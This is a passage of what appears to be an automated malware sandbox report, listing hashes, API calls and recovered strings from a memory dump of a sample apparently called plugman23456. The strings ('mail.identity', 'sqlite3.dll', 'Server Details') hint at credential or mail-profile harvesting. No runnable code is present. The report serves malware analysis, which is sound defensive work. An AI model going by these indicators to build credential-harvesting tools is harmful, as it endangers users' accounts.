                          • Instruction ID: e44d10e2ba05df3f3c4ea20365ac2b40f6a529c5f902ff1350b2aa0f2f7d2ce1
                          • Opcode Fuzzy Hash: 481fecb55ebe7fb47740a6b69fad8160bec1c4c1e9b6d2800cf49c311f8ba602
                          • Instruction Fuzzy Hash: 3A413D35900204EFCF10DFA9C481AA9BBF4FF48348F1144BAE815AB392D739DA41CB99
                          APIs
                          Memory Dump Source
                          • Source File: 00000016.00000002.397966899.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_22_2_400000_plugman23456.jbxd
                          Similarity
                          • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@_gmtime64memcpystrftime
                          • String ID:
                          • API String ID: 1886415126-0
                          • Opcode ID: 2c8248469399fbf04d0dbf47d68c6bd2d8f4f823657728d056fdecfbecaff4db
                          • Instruction ID: 0fc2308174198aa020173da426f8fce31fb0284c5be342abf897f659f69a0370
                          • Opcode Fuzzy Hash: 2c8248469399fbf04d0dbf47d68c6bd2d8f4f823657728d056fdecfbecaff4db
                          • Instruction Fuzzy Hash: 6F21E472A013145BD320EB69C846B5BB7D8AF44734F044A1FFAA8D73D1D738E9448699
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000016.00000002.397966899.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_22_2_400000_plugman23456.jbxd
                          Similarity
                          • API ID: strlen
                          • String ID: >$>$>
                          • API String ID: 39653677-3911187716
                          • Opcode ID: fe8035a2bc0feec0fd3c25fdeb621276a2bec91dd981480682d5a40b5cd82bd5
                          • Instruction ID: 00f684ae2741cafacb4c0f359147db44c9a3c2c025b4d94400920e38b4f60055
                          • Opcode Fuzzy Hash: fe8035a2bc0feec0fd3c25fdeb621276a2bec91dd981480682d5a40b5cd82bd5
                          • Instruction Fuzzy Hash: E131261180D6C4AEEB11CFA880463EEFFB05FA2304F5886DAD0D047743C67C964AC3AA
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000016.00000002.397966899.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_22_2_400000_plugman23456.jbxd
                          Similarity
                          • API ID: memcpy
                          • String ID: @
                          • API String ID: 3510742995-2766056989
                          • Opcode ID: 5364360adcdec80b12010bd2de721da4a734fa53c949916e07c670fac02dc71b
                          • Instruction ID: 6d1199ef97cb2679a5b3fe4a4c98cea7b7ae300cfbacc21e3dff9814a3884c4c
                          • Opcode Fuzzy Hash: 5364360adcdec80b12010bd2de721da4a734fa53c949916e07c670fac02dc71b
                          • Instruction Fuzzy Hash: 41113DB2E007046BDB288E96DC80D5A77A8EFA0354700013FFE06662D1F639EA5DC7D8
                          APIs
                          • strlen.MSVCRT ref: 0040797A
                          • ??3@YAXPAX@Z.MSVCRT ref: 0040799A
                            • Part of subcall function 00406F30: malloc.MSVCRT ref: 00406F4C
                            • Part of subcall function 00406F30: memcpy.MSVCRT ref: 00406F64
                            • Part of subcall function 00406F30: ??3@YAXPAX@Z.MSVCRT ref: 00406F6D
                          • ??3@YAXPAX@Z.MSVCRT ref: 004079BD
                          • memcpy.MSVCRT ref: 004079DD
                          Memory Dump Source
                          • Source File: 00000016.00000002.397966899.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_22_2_400000_plugman23456.jbxd
                          Similarity
                          • API ID: ??3@$memcpy$mallocstrlen
                          • String ID:
                          • API String ID: 1171893557-0
                          • Opcode ID: defd1bd1be5bbd5284309495682469d6dd103d7cb5d76ad0db5bff9d1363c284
                          • Instruction ID: 28856836b01dc1c1490a34e4127c9d88e875caa212a522c6554fbe506b42c8ef
                          • Opcode Fuzzy Hash: defd1bd1be5bbd5284309495682469d6dd103d7cb5d76ad0db5bff9d1363c284
                          • Instruction Fuzzy Hash: A211CDB1604600EFD720DF18D880E9AB7F5EF48328B108A2EE852A76D1C735F8158B59
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000016.00000002.397966899.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_22_2_400000_plugman23456.jbxd
                          Similarity
                          • API ID: _strcmpi
                          • String ID: C@$mail.identity
                          • API String ID: 1439213657-721921413
                          • Opcode ID: 4271e50fa9e0cb48d23f84e20e6912c8f7ba64196effffc20a844cddd1a4c075
                          • Instruction ID: e081b0b03caa8c584547328dd3c7b46ba64ccdb110812537a35def5e1e6d8c92
                          • Opcode Fuzzy Hash: 4271e50fa9e0cb48d23f84e20e6912c8f7ba64196effffc20a844cddd1a4c075
                          • Instruction Fuzzy Hash: DD110A325002199BEB20AA65DC41E8A739CEF00358F10453FF545B6182EF38F9598B98
                          APIs
                          • memset.MSVCRT ref: 00406640
                            • Part of subcall function 004063B2: memset.MSVCRT ref: 0040644F
                            • Part of subcall function 004063B2: memcpy.MSVCRT ref: 00406462
                            • Part of subcall function 004063B2: memcpy.MSVCRT ref: 00406475
                          • memcmp.MSVCRT ref: 00406672
                          • memcpy.MSVCRT ref: 00406695
                          Strings
                          Memory Dump Source
                          • Source File: 00000016.00000002.397966899.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_22_2_400000_plugman23456.jbxd
                          Similarity
                          • API ID: memcpy$memset$memcmp
                          • String ID: Ul@
                          • API String ID: 270934217-715280498
                          • Opcode ID: ff49a6b21300bdc1e28d83de90f780c1e5e431fdc449c6fd399a747e7733bd1d
                          • Instruction ID: 50cfa42ee3f36d69bd2a91aaf20a03d2fa08f341615043147a7a382cdea3e611
                          • Opcode Fuzzy Hash: ff49a6b21300bdc1e28d83de90f780c1e5e431fdc449c6fd399a747e7733bd1d
                          • Instruction Fuzzy Hash: 46017572A0020C6BEB10DAA58C06FEF73ADAB44705F450436FE49F2181E679AA1987B5
                          APIs
                            • Part of subcall function 00408DB6: LoadStringA.USER32(00000000,00000006,?,?), ref: 00408E7F
                            • Part of subcall function 00408DB6: memcpy.MSVCRT ref: 00408EBE
                          • sprintf.MSVCRT ref: 0040B929
                          • SendMessageA.USER32(?,00000401,00000000,?), ref: 0040B98C
                            • Part of subcall function 00408DB6: _mbscpy.MSVCRT ref: 00408E31
                            • Part of subcall function 00408DB6: strlen.MSVCRT ref: 00408E4F
                          • sprintf.MSVCRT ref: 0040B953
                          • _mbscat.MSVCRT ref: 0040B966
                          Memory Dump Source
                          • Source File: 00000016.00000002.397966899.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_22_2_400000_plugman23456.jbxd
                          Similarity
                          • API ID: sprintf$LoadMessageSendString_mbscat_mbscpymemcpystrlen
                          • String ID:
                          • API String ID: 203655857-0
                          • Opcode ID: e7a96a4b3b60773b868b861c6ef1878d2d31708076d5e2e16fac633899c29946
                          • Instruction ID: 0d6227c2dffbdb2154d3321facad49e181a647ebd34d8d5e6c5aab0b846496ed
                          • Opcode Fuzzy Hash: e7a96a4b3b60773b868b861c6ef1878d2d31708076d5e2e16fac633899c29946
                          • Instruction Fuzzy Hash: EE0117B2500308A6E721EB75DC87FE773ACAB54704F04046AB659B61C3DA78E5444A59
                          APIs
                          Memory Dump Source
                          • Source File: 00000016.00000002.397966899.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_22_2_400000_plugman23456.jbxd
                          Similarity
                          • API ID: ??3@
                          • String ID:
                          • API String ID: 613200358-0
                          • Opcode ID: 5d8d0877f012efe10e0b4b5f1adc401335cc840e4779c4491c3e00c233fdc506
                          • Instruction ID: 5841ab7dcc50b440abd9236b7832042a9d7d1d7b8957bb774bcacf87f05c1f29
                          • Opcode Fuzzy Hash: 5d8d0877f012efe10e0b4b5f1adc401335cc840e4779c4491c3e00c233fdc506
                          • Instruction Fuzzy Hash: AAE046A134974456BA10AF7BAC52F13239CEA803523168C6FB800F36D2EF2CE890846C
                          APIs
                            • Part of subcall function 004176F4: memcmp.MSVCRT ref: 004177B6
                          • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00418726
                          • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00418770
                          Strings
                          • recovered %d pages from %s, xrefs: 004188B4
                          Memory Dump Source
                          • Source File: 00000016.00000002.397966899.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_22_2_400000_plugman23456.jbxd
                          Similarity
                          • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@$memcmp
                          • String ID: recovered %d pages from %s
                          • API String ID: 985450955-1623757624
                          • Opcode ID: 9d09b39b818056697e6918b79f21f12d68d35230e64058568acdb5651893ba04
                          • Instruction ID: 98aa3c95e39363207900286e283e4ca218167c091a2ac8f6aa08d387a6555cb7
                          • Opcode Fuzzy Hash: 9d09b39b818056697e6918b79f21f12d68d35230e64058568acdb5651893ba04
                          • Instruction Fuzzy Hash: BA81AF759006049FDB25DBA8C880AEFB7F6EF84324F25441EE95597381DF38AD82CB58
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000016.00000002.397966899.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_22_2_400000_plugman23456.jbxd
                          Similarity
                          • API ID: _ultoasprintf
                          • String ID: %s %s %s
                          • API String ID: 432394123-3850900253
                          • Opcode ID: 16242442a3dc2496cbd1affae0ffec3615c5459b66bdf10bcc66490599bfb82e
                          • Instruction ID: 5b4e28b1b4fc8494891684f3550fd3cb18a3cec27640a2844273e51cea36df92
                          • Opcode Fuzzy Hash: 16242442a3dc2496cbd1affae0ffec3615c5459b66bdf10bcc66490599bfb82e
                          • Instruction Fuzzy Hash: 80412331504A15C7C93595648B8DBEBA3A8BB46300F5804BFDCAAB32C0D3FCAD42865E
                          APIs
                          • memset.MSVCRT ref: 00409919
                          • SendMessageA.USER32(N\@,00001019,00000000,?), ref: 00409948
                          Strings
                          Memory Dump Source
                          • Source File: 00000016.00000002.397966899.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_22_2_400000_plugman23456.jbxd
                          Similarity
                          • API ID: MessageSendmemset
                          • String ID: N\@
                          • API String ID: 568519121-3851889168
                          • Opcode ID: 2010a019ef781dd6939f17f8e62f95d5074ac9a6fd296138cb71cbff55b3af76
                          • Instruction ID: 8500237f8b168207f1c9a25e89cff2ec53edf3448a21c69821c5a9264d9502ca
                          • Opcode Fuzzy Hash: 2010a019ef781dd6939f17f8e62f95d5074ac9a6fd296138cb71cbff55b3af76
                          • Instruction Fuzzy Hash: 3C016279800205AADB209F59C845AEBB7F8FF85B45F00802DE894B6241D374A945CB79
                          APIs
                          • LoadMenuA.USER32(00000000), ref: 00409078
                          • sprintf.MSVCRT ref: 0040909B
                            • Part of subcall function 00408F1B: GetMenuItemCount.USER32(?), ref: 00408F31
                            • Part of subcall function 00408F1B: memset.MSVCRT ref: 00408F55
                            • Part of subcall function 00408F1B: GetMenuItemInfoA.USER32(?), ref: 00408F8B
                            • Part of subcall function 00408F1B: memset.MSVCRT ref: 00408FB8
                            • Part of subcall function 00408F1B: strchr.MSVCRT ref: 00408FC4
                            • Part of subcall function 00408F1B: _mbscat.MSVCRT ref: 0040901F
                            • Part of subcall function 00408F1B: ModifyMenuA.USER32(?,?,00000400,?,?), ref: 0040903B
                          Strings
                          Memory Dump Source
                          • Source File: 00000016.00000002.397966899.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_22_2_400000_plugman23456.jbxd
                          Similarity
                          • API ID: Menu$Itemmemset$CountInfoLoadModify_mbscatsprintfstrchr
                          • String ID: menu_%d
                          • API String ID: 1129539653-2417748251
                          • Opcode ID: be058396830e840a3b70168f9115533db366257c5066184df4aab31ac4a42a38
                          • Instruction ID: bbc3668ae8aad1463aedfde5e5dd5b48340f77aa4c3989790123ead7330def9b
                          • Opcode Fuzzy Hash: be058396830e840a3b70168f9115533db366257c5066184df4aab31ac4a42a38
                          • Instruction Fuzzy Hash: 2ED0C260A4124036EA2023366C0AF4B1A099BC271AF14022EF000B20C3EBFC844482BE
                          APIs
                          Strings
                          • failed memory resize %u to %u bytes, xrefs: 00411706
                          Memory Dump Source
                          • Source File: 00000016.00000002.397966899.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_22_2_400000_plugman23456.jbxd
                          Similarity
                          • API ID: _msizerealloc
                          • String ID: failed memory resize %u to %u bytes
                          • API String ID: 2713192863-2134078882
                          • Opcode ID: b5cbcb03e4e476f93ec765dc128528ecfd056f92ca38a68215b2957d827f1bcd
                          • Instruction ID: 6d708a2afe7937de994116278d2c06faa365a3e4d7322368aba5da3f7b150b0b
                          • Opcode Fuzzy Hash: b5cbcb03e4e476f93ec765dc128528ecfd056f92ca38a68215b2957d827f1bcd
                          • Instruction Fuzzy Hash: DBD0C2329092107EEB152250AC03B5FAB51DB80374F25850FF658451A1E6795C108389
                          APIs
                            • Part of subcall function 00406F96: GetModuleFileNameA.KERNEL32(00000000,00000104,00000104,00409805,00000000,00409723,?,00000000,00000104), ref: 00406FA1
                          • strrchr.MSVCRT ref: 00409808
                          • _mbscat.MSVCRT ref: 0040981D
                          Strings
                          Memory Dump Source
                          • Source File: 00000016.00000002.397966899.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_22_2_400000_plugman23456.jbxd
                          Similarity
                          • API ID: FileModuleName_mbscatstrrchr
                          • String ID: _lng.ini
                          • API String ID: 3334749609-1948609170
                          • Opcode ID: 98f2440ea2097efbff780d18735bc8e6eaa27cf1360ec9cb317463341ca83b29
                          • Instruction ID: 627d3aba04136714d7c1818045af5338c576ea1e6c84acb30438f8bc90b354f8
                          • Opcode Fuzzy Hash: 98f2440ea2097efbff780d18735bc8e6eaa27cf1360ec9cb317463341ca83b29
                          • Instruction Fuzzy Hash: 73C080019497D018F12235212D03F4F06884F83709F34005FF801796C3EF9CA611407F
                          APIs
                          • _mbscpy.MSVCRT ref: 004070EB
                            • Part of subcall function 00406D55: strlen.MSVCRT ref: 00406D56
                            • Part of subcall function 00406D55: _mbscat.MSVCRT ref: 00406D6D
                          • _mbscat.MSVCRT ref: 004070FA
                          Strings
                          Memory Dump Source
                          • Source File: 00000016.00000002.397966899.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_22_2_400000_plugman23456.jbxd
                          Similarity
                          • API ID: _mbscat$_mbscpystrlen
                          • String ID: sqlite3.dll
                          • API String ID: 1983510840-1155512374
                          • Opcode ID: 630fb5f27daad17d498a2939fbb1447296fc35da86cfe41959fb393c0c6f0023
                          • Instruction ID: ab8058c300e11a65186fba7fca0927c942ef8f40a12134081a956aaad4b84faf
                          • Opcode Fuzzy Hash: 630fb5f27daad17d498a2939fbb1447296fc35da86cfe41959fb393c0c6f0023
                          • Instruction Fuzzy Hash: 42C0803340517035770276717D03A9F794DCF81355B01045AF54451112F529891241EB
                          APIs
                          • GetPrivateProfileStringA.KERNEL32(Server Details,?,0044C52F,A4@,0000007F,?), ref: 004033C8
                          Strings
                          Memory Dump Source
                          • Source File: 00000016.00000002.397966899.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_22_2_400000_plugman23456.jbxd
                          Similarity
                          • API ID: PrivateProfileString
                          • String ID: A4@$Server Details
                          • API String ID: 1096422788-4071850762
                          • Opcode ID: 55c4497567308b46e508750365dc53e52d0a25bfb23d4dcbdca40916d4ea9269
                          • Instruction ID: 3fa8da6ebb007cc1aa22036e73777017e29eb1af1cc7e931feee2a89adc62c4b
                          • Opcode Fuzzy Hash: 55c4497567308b46e508750365dc53e52d0a25bfb23d4dcbdca40916d4ea9269
                          • Instruction Fuzzy Hash: C8C08C32189301BAEA418F80AD46F0EBBA2EBA8B00F044409B244200A682B94020EF17
                          APIs
                          Memory Dump Source
                          • Source File: 00000016.00000002.397966899.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_22_2_400000_plugman23456.jbxd
                          Similarity
                          • API ID: memcpy$memset
                          • String ID:
                          • API String ID: 438689982-0
                          • Opcode ID: 3e8938812e192c77fa2f1ca69e9b365f101ee6c3f919cceff69a24fa811216df
                          • Instruction ID: 02088d5bd302ba8124152156f4c24fba1fa2279ed4138068a4a2dd0dfc44ef6b
                          • Opcode Fuzzy Hash: 3e8938812e192c77fa2f1ca69e9b365f101ee6c3f919cceff69a24fa811216df
                          • Instruction Fuzzy Hash: BC61BDB2604712AFD710DF65E8C1B2BB7E5FF84304F40892EF99896250D338E955CB9A
                          APIs
                          Memory Dump Source
                          • Source File: 00000016.00000002.397966899.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_22_2_400000_plugman23456.jbxd
                          Similarity
                          • API ID: FreeLocalmemcpymemsetstrlen
                          • String ID:
                          APIs
                          Memory Dump Source
                          • Source File: 00000016.00000002.397966899.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_22_2_400000_plugman23456.jbxd
                          Similarity
                          • API ID: memcpy
                          • String ID:
                          APIs
                          Memory Dump Source
                          • Source File: 00000016.00000002.397966899.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_22_2_400000_plugman23456.jbxd
                          Similarity
                          • API ID: ??2@$memset
                          • String ID: